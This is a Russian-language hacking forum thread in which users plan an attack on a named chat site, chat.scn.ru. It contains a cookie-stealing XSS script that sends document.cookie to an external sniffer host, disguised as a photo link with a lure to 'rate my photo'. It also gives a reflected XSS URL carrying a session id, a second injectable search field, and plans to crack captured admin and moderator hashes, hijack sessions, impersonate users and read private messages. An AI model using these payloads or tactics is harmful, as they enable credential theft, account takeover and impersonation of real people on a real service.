Чаты проверьте чат на уязвимость

т.е. можно вот эту ссылку
<script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>
вставить в строку куда надо вводить адрес фотки, а место s.jpg написать реальный адрес фотки и звать всех заценить мою фотку

что делать с
http://chat.scn.ru/index.php?session=366b076ea4992e9fb9403f1a4794296a &go=<script>alert('XSS')</script>

 

куда ты вводил адрес снифера
чет я сним совсем запутался

 

если снифер выдает хэши => можно писать от друголи лица, проверьте это в этом чате

 

адресс сниффера я вводил в форум. теперь сижу и жду когда либо этот модер, либо админ откроет сообщение и тогда мне придёт его хэш.
если расшифруем хэш, то получим пароль, авторизировавшись логином владельца хэша, мы с можем писать от его лица.

 

постой куда именно и как ты вводил сниф в форуме и куда и как его вводить в чате из статьи я этого не понял

а нельзя просто скопировать форму отправки сообщений и свой хэш заменить на его, и отправлять сообщения неавторизовавшись

может просто сказать в чате что в форуме замутил клевую тему (якобы зацените)

 

Антошка2003, если не в лом, проверь алерт.. у меня некоторые подозрения насчёт него..
_http://chat.scn.ru/index.php?session=366b076ea4992e9fb9403f1a4794296a&go=<script>alert('XSS')</script>

Долго хэши ждать прийдётся)

 

как вставлять в фрум читай здесь - http://www.forum.antichat.ru/thread12610.html
в чате на каждый вход даёться разная сессия, если авторизироваться его сессией, то может что то и выйдет. как сессию перехватывать смотри этот раздел, была тема о взломе вуду чатов.
попробуй скажи что замутили клёвую тему.

я попозже попробую с алертами, сейчас не могу пока что. но так кажется что он ничего не даст, но нужно посмотреть, может как и можно будет применить.

 

ruh, ясн..
Оффтопик:
Rayden отключил меня на неделю, причина: наш чат не ломается
лол)

 

опечатка:
часто бывает

 

как он тебя спалил

 

подведем итоги:

 

Я носки не стал менять, вот и спалил)

 

я серьезно


и почему на счет аплета ответ был учим, а не учи

 

Я тоже йопт) Нафлудили 4 страницы...(
Носки=прокси.. ясно?)

1. аЛЕРт
2. жжош, не придирайся к словам) а то тему нахъ закроют за непомерный флуд

 

так какой вывод по чату в общем:
1. получить права админа(модератора)
2. забанить модератора
3. что мне может дать та ссылка с xss

 

4. можно ли в этом чате читать приваты

 

ваше мнение и общие выводы по этому чату

согласны ли вы с Rayden по поводу не возможности взлома данного чата

 

Йопт, чат ломают не молотком..
Антошка2003, залил сниффер на форум, прийдут хэши, тогда и видно будет..
Потерпи немного, не на пожар..

 

Так ребята я только что заметил тему прошолся по чату , тама ешё в чате есть КСС , боковой фрейм где ники, внезу (Фотографии),открываем и видем напись (Введите текст для поиска или ник, ставим <script>alert()</script>, вылетает алерт, можна и им воспользоватся.